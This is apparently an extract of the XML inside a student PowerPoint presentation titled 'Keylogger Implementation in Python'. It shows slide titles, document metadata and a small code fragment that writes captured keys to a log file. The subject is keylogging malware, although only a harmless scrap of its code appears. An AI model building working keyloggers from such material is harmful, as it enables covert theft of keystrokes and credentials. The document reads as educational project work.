              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>key_list_bytes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>json.dumps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>keys_used</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>).encode()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>key_log.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>key_list_bytes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736" y="143607"/>
            <a:ext cx="8220481" cy="5657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7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630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system-ui</vt:lpstr>
      <vt:lpstr>Trebuchet MS</vt:lpstr>
      <vt:lpstr>ui-monospace</vt:lpstr>
      <vt:lpstr>ui-sans-serif</vt:lpstr>
      <vt:lpstr>Wingdings 3</vt:lpstr>
      <vt:lpstr>Facet</vt:lpstr>
      <vt:lpstr>NAME:NUJELLA RAVINDRA KUMAR</vt:lpstr>
      <vt:lpstr>  </vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PROJECT  OVERVIEW</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PROGRAM</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>RESULT OF KET LOGGER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Keylogger Implementation in Python</dc:title>
  <dc:creator>Lenovo</dc:creator>
  <cp:lastModifiedBy>Lenovo</cp:lastModifiedBy>
  <cp:revision>11</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-05-31T03:19:05Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-06-06T06:54:38Z</dcterms:modified>
</cp:coreProperties>
</file>